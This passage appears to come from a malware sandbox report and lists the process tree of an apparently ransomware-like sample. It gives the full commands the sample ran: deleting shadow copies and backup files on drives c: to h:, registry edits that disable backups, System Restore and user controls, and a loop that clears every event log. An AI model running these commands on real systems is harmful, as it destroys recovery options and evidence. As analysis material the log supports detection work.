taskkill /IM mydesktopqos.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopservice.exe /F
2⤵
PID:1992

C:\Windows\system32\taskkill.exe
taskkill /IM mydesktopservice.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
2⤵
PID:624

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
2⤵
PID:1636

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
3⤵
- Interacts with shadow copies
PID:1524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
2⤵
PID:1392

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
3⤵
- Interacts with shadow copies
PID:288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
2⤵
PID:952

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1732

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
4⤵
PID:952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
2⤵
PID:1648

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
2⤵
PID:608

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
2⤵
PID:1628

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
2⤵
PID:1928

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
2⤵
PID:624

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
2⤵
PID:580

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
2⤵
PID:1860

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
2⤵
PID:216

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:224

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
2⤵
PID:1288

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
2⤵
PID:1132

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:ackup*.* c:*.set c:*.win
2⤵
PID:1392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:ackup*.* d:*.set d:*.win
2⤵
PID:1800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:ackup*.* e:*.set e:*.win
2⤵
PID:1740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:ackup*.* f:*.set f:*.win
2⤵
PID:980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:ackup*.* g:*.set g:*.win
2⤵
PID:632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:ackup*.* h:*.set h:*.win
2⤵
PID:764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del %0
2⤵
PID:1820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s hrmlog2
2⤵
PID:1296

C:\Windows\system32\attrib.exe
attrib +h +s hrmlog2
3⤵
- Views/modifies file attributes
PID:1976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\hrmlog2
2⤵
PID:1648

C:\Windows\system32\attrib.exe
attrib +h +s C:\ProgramData\hrmlog2
3⤵
- Views/modifies file attributes
PID:1140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
2⤵
PID:468

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
3⤵
PID:1916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
2⤵
PID:1948

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
3⤵
PID:696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
2⤵
PID:1772

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
3⤵
PID:1992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
2⤵
PID:1700

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
3⤵
PID:1628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
2⤵
PID:1988

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
3⤵
PID:772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
2⤵
PID:2012

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
3⤵
PID:1944

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
2⤵
PID:1348

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
3⤵
PID:524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
2⤵
PID:1512

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
3⤵
PID:272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
2⤵
PID:624

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
3⤵
PID:1940

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
2⤵
PID:1920

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
3⤵
PID:1112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
2⤵
PID:1476

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
3⤵
PID:212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
2⤵
PID:204

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
3⤵
PID:1636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
2⤵
PID:2044

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
3⤵
PID:1860

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
2⤵
PID:876

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
3⤵
PID:232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
2⤵
PID:228

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
3⤵
PID:220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
2⤵
PID:824

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
3⤵
PID:1640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
2⤵
PID:1508

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
3⤵
PID:1088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
2⤵
PID:1288

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
3⤵
PID:288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
2⤵
PID:1608

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
3⤵
PID:852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
2⤵
PID:1712

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
3⤵
PID:1864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
2⤵
PID:564

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
3⤵
PID:1328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
2⤵
PID:1732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
2⤵
PID:1536

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
3⤵
PID:2032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
2⤵
PID:1032

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
3⤵
PID:1484

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
2⤵
PID:556

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
3⤵
PID:1248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
2⤵
PID:268

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
3⤵
PID:1308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
2⤵
PID:1532

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
3⤵
PID:608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
2⤵
PID:1168

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
3⤵
PID:1356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
2⤵
PID:520

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
3⤵
PID:884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
2⤵
PID:1200

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
3⤵
PID:1632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
2⤵
PID:1928

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
3⤵
PID:1664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
2⤵
PID:1428

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
3⤵
PID:1156

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"
2⤵
PID:1240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wevtutil.exe el
3⤵
PID:1748

C:\Windows\system32\wevtutil.exe
wevtutil.exe el
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1496

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Analytic"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:624

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Application"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1564

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "DebugChannel"
3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "DirectShowFilterGraph"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "DirectShowPluginControl"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:204

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Els_Hyphenation/Analytic"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:860

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "EndpointMapper"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "ForwardedEvents"
3⤵
PID:216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "HardwareEvents"
3⤵
PID:228

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Internet Explorer"
3⤵
- Clears Windows event logs
PID:1280

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Key Management Service"
3⤵
PID:1088

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
3⤵
PID:1764

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Media Center"
3⤵
PID:1100

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationDeviceProxy"
3⤵
PID:1608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPerformance"
3⤵
PID:1132

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPipeline"
3⤵
- Clears Windows event logs
PID:1328

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPlatform"
3⤵
PID:632

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-IE/Diagnostic"
3⤵
PID:1732

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-IEDVTOOL/Diagnostic"
3⤵
PID:764

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
3⤵
PID:1484

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
3⤵
PID:1648

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
3⤵
PID:556

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"
3⤵
- Clears Windows event logs
PID:1916

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"
3⤵
PID:608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-API-Tracing/Operational"
3⤵
PID:1772

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ATAPort/General"
3⤵
- Clears Windows event logs
PID:1168

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"
3⤵
PID:1628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"
3⤵
PID:1632

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AltTab/Diagnostic"
3⤵
PID:2012

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppID/Operational"
3⤵
PID:1928

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"
3⤵
PID:524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"
3⤵
PID:2016

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"
3⤵
PID:1748

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"
3⤵
PID:624

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"
3⤵
PID:1564

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"
3⤵
PID:212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Problem-Steps-Recorder"
3⤵
PID:1524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
3⤵
PID:204

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
3⤵
PID:860

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"
3⤵
PID:232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory/Debug"
3⤵
- Clears Windows event logs
PID:216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"
3⤵
PID:228

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"
3⤵
PID:1280

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/Operational"
3⤵
- Clears Windows event logs
PID:1088

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/Performance"
3⤵
- Clears Windows event logs
PID:1764

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"
3⤵
PID:1100

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"
3⤵
PID:1608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"
3⤵
PID:1132

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Backup"
3⤵
PID:1328

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"
3⤵
PID:632

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
3⤵
PID:1732

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
3⤵
PID:764

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"
3⤵
PID:1484

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"
3⤵
PID:1648

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
3⤵
PID:556

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"
3⤵
PID:1916

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
3⤵
- Clears Windows event logs
PID:608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
3⤵
PID:1772

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"
3⤵
PID:1168

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"
3⤵
PID:1628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"
3⤵
PID:1632

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"
3⤵
PID:2012

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/Analytic"
3⤵
PID:1928

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"
3⤵
PID:524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Calculator/Debug"
3⤵
PID:2016

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Calculator/Diagnostic"
3⤵
PID:1748

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"
3⤵
PID:624

C:\Windows\system32\wevtutil.exe
